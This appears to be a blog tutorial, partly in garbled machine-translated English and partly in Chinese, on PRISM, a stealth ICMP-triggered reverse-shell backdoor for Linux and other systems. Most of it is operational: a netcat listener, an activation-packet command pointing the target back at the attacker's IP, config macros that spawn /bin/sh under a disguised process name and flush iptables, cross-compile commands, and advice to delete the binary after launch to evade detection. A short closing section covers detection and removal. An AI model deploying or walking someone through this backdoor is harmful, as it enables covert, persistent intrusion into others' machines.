ICMP bounce backdoor under Linux: PRISM

The ping-based ICMP backdoor that was inadvertently seen while searching. So to the author's GitHub to see, incredibly is engraved, in order to level, can only endure to see, the student dog hurt. Fortunately it's easier to understand, as the introduction says: "PRISM is a user space stealth reverse shell backdoor, written in pure C."

Project address:https://github.com/andreafabrizi/prism

Prism has only two main files, simple configuration, can be run on Linux,Solaris,AIX,bsd/mac,Android and many other systems, Two modes of operation are supported:ICMP and STATIC .

ICMP模式

　　使用这种模式的后门将会在后台等待特定的包含主机/端口连接信息的ICMP数据包，通过私有密钥可以阻止第三方访问。后门进程接受ping包激活（总不会连ping包都不让过了靶>_<）

　　首先，在攻击者的机器上运行netcat来等待后门进入的连接：

~$ Nc-l-P 9999

Re-usesendPacket.py脚本（或其他数据包生成器，如nemesis-1.4）发送激活包到后门主机，以使后门主机反弹连接到主控机的指定端口：

./sendpacket.py 10.0.0.5 Linger 10.0.0.10 9999//10.0.0.5 remote host (target drone) IP address//linger connection password//10.0.0.10 Master IP address//9999 host computer connection port

STATIC 模式

　　使用这种模式，后门主机将会主动尝试连接到指定端口的的IP地址上，所以只要在指定IP上监听指定端口等待连接就可以了。但是，缺点很明显，很任意暴露攻击者的IP地址，而且使用不够灵活。

Of course, as a mini-level backdoor Trojan. It also has a number of advantages:

No library support is required for two modes of operation, runtime process renaming, no listening for ports, automatic purge of iptables rule tables, C language (code with only 200来 lines).

Configuring the Prism Backdoor

Edit the Prism.c file and modify the macro definition section:

#ifdef STATIC $ # define Reverse_host     "10.0.0.1"  //IP address connected to the Master machine # define Reverse_port     19832   // Port number to connect to the host computer # define Respawn_delay  //The idle time interval of the backdoor attempt to connect #else # define icmp_packet_size 1024x768  //icmp Packet The size of the # define Icmp_key         "linger"  //Connected password #endif #define VERSION          "0.5"   //version information #define MO TD             "PRISM V" VERSION "started\n\n#"  ///Backdoor connection when the message is displayed #define SHELL            "/bin/sh"  //shell executed position 52 # Define Process_name     "UDEVD"   //created process name

Cross-compiling Prism backdoor

GCC <. OPTIONS: >-wall-s-O prism prism.c

Available Parameters <OPTION> options:

-ddetach //Background run
-dstatic //Only in static mode (default is ICMP mode)
-dnorename //rename process name no longer
-diptables //Clear all Iptables rule table entries

For example:

Gcc-ddetach-dnorename-wall-s-O Prism prism.c

Cross-compilation under different platforms requires the relevant library files:

Android Platform:

Apt-get Install GCC-ARM-LINUX-GNUEABIARM-LINUX-GNUEABI-GCC-DSTATIC-DDETACH-DNORENAME-STATIC-MARCH=ARMV5 Prism.c-o Prism

Linux 64bit:

Apt-get Install Libc6-dev-amd64gcc-ddetach-m64-wall-s-O prism prism.c

Linux 32bit:

Apt-get Install Libc6-dev-i386gcc-ddetach-m32-wall-s-O prism prism.c

After compiling, you can view the configuration information of the backdoor:

Run the prism Backdoor test

Upload the backdoor to the remote backdoor host, and then use thesendPacket.py脚本（需以root运行）在本地发送激活包到后门主机，本地监听相关端口等待后门主机反弹连接：（这里要注意，最好时将prism.c文件上传到后门主机再进行编译，这样才更容易成功。）

　　这对于采用了很多限制（比喻限制了SSH）远程服务器来说，使用该后门是不错的。而且prism服务端运行后会在后台一直运行，除非服务器重启。所以，后门开启后删除自身文件将不容易被发现。

简单讲解prism后门的清除

　　首先，上面说了，该后门重启会失效，除非写在开机启动项里。所以攻击者想要继续留住后门，肯定会这样做，故首先要检查开机启动项里（比如/etc/rc.local,这可是root权限！）是否有未知启动脚本。联想起前段时间的BASH漏洞，有一个不错的思路是在cgi-bin里的某个脚本里作改变，当访问这个脚本时就可以触发这个prism后门，这样就可以不用之前的python脚本来触发了。厄，貌似这就讲到攻击了-_- 不管怎样，先得有点见识靶。搞不好还真有人会这样用呢。

　　其次，虽然这个后门可以改变后门进程名，但是还是有进程存在，所以要查出这个未知进程。可以用工具查找，找到kill掉就OK了。

　　最后，要设置好严格的iptables规则。该后门可以按攻击者的设置尝试清除iptables规则，所以要定期查看iptables规则是否改变。

　　还有，该后门是使用ICMP协议的PING包激活的，SO，如果还真怕PRISM的会，那就过滤掉ICMP包靶，走着瞧靶v_v

　　但是，站在攻击者的角度来看，想要防范prism后门还是比较难的。正如其作者所描述的那样：“No listening ports”，啥意思？就是想用啥端口连接都可以，额测试过了: ) 这么说来，貌似上上一条有失效了-_-

　　所以，综上所属，最好的办法就是做好预防工作，防止被入侵。为啥？因为我是傻逼{-_-}

ICMP bounce backdoor under Linux: PRISM